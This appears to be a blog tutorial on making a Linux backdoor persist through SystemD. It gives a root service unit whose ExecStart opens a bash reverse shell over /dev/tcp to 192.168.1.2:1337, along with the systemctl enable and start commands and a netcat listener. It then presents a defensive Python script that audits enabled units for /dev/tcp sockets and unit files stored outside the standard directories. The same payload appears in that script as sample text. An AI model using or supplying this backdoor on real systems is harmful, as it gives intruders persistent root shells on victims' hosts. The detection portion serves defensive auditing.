SystemD backdoor

Image by PublicDomainPictures on Pixabay

Some programs are useful to start every time the system boots. The use cases range from web services to persistent malware; your imagination is the only limitation.

In this article, I will show a simple way to create a backdoor service that is managed by SystemD on a Linux host.

Reverse Shell Service

Persistent access to remote host

Do you ever find yourself in a situation where it would be nice to have persistent access to a remote host even after it reboots? Well, then a SystemD service is a simple means to that end.

To get this working, you need root-level permissions on the host.

Start by creating a service definition file and storing it somewhere on the system. In this example, we place it in the /tmp directory.

vim /tmp/root4you.service

The contents of /tmp/root4you.service:

[Unit]
Description=This is not the evil service you are looking for...

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/1337 0>&1'

[Install]
WantedBy=multi-user.target

This file is used to add an entry to SystemD. To register the service with SystemD and enable it to run at system startup, run this command:

systemctl enable /tmp/root4you.service

Once the service is added to SystemD, the file is no longer needed.

The service starts a reverse shell that tries to connect to the IP address 192.168.1.2 on port 1337. For the connection to succeed, the host at that IP address must have Netcat listening on the same port:

nc -nlvp 1337

Manage service

Start, Stop and Status

This service can now be managed just like any other SystemD-managed service with these commands:

systemctl start root4you
systemctl stop root4you
systemctl status root4you

Because the service is enabled, SystemD will start it the next time the host boots, but it is not running yet. To start the service now and test that it works, start it manually with systemctl start.
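From the defender's side, this procedure leaves two artefacts: a symlink in a *.wants/ directory that systemctl enable creates (when enable is given a full path, the link points back at that path, here under /tmp), and an ExecStart that opens a /dev/tcp socket. The following audit script is an added example, not code from the article; the unit text it checks is constructed from the unit file above, and the trusted directory list is an assumption you should adjust for your distribution.

```python
import glob
import os
import re

# Where a distribution or administrator normally installs unit files (assumed list).
TRUSTED_UNIT_DIRS = ("/etc/systemd/system/", "/usr/lib/systemd/system/", "/lib/systemd/system/")
DEV_TCP = re.compile(r"/dev/(tcp|udp)/")  # bash network redirection, as in the article's ExecStart

def exec_start_of(text):
    """Return the ExecStart= value from a unit's [Service] section ('' if none)."""
    section, value = None, ""
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "Service" and line.startswith("ExecStart="):
            value = line.split("=", 1)[1].strip()  # last assignment wins, as in systemd
    return value

def audit_unit(resolved_path, text):
    """Return reasons a unit looks like a reverse-shell backdoor (empty list = clean)."""
    findings = []
    if not resolved_path.startswith(TRUSTED_UNIT_DIRS):
        findings.append(f"unit file resolves outside standard unit dirs: {resolved_path}")
    if DEV_TCP.search(exec_start_of(text)):
        findings.append("ExecStart opens a bash /dev/tcp or /dev/udp socket")
    return findings

def scan_enabled_units(root="/etc/systemd/system"):
    """Audit every unit that 'systemctl enable' symlinked into a *.wants/ directory."""
    report = {}
    for link in glob.glob(os.path.join(root, "*.wants", "*.service")):
        real = os.path.realpath(link)  # enabling /tmp/x.service leaves a link back to /tmp
        try:
            findings = audit_unit(real, open(real).read())
        except OSError as exc:
            findings = [f"dangling wants-link: {exc}"]  # unit file deleted or /tmp cleared
        if findings:
            report[link] = findings
    return report

# Constructed sample: the article's unit file, as it resolves after 'systemctl enable /tmp/...'.
SAMPLE_UNIT = """[Unit]
Description=This is not the evil service you are looking for...
[Service]
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/1337 0>&1'"""

if __name__ == "__main__":
    print("sample:", audit_unit("/tmp/root4you.service", SAMPLE_UNIT))
    print("live:", scan_enabled_units())
```

Run it as root on the host to audit the real *.wants/ links; a dangling link is itself worth investigating, since /tmp is typically cleared at reboot.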

Removal

Clean up the mess

To remove the service from SystemD, simply disable it:

systemctl disable root4you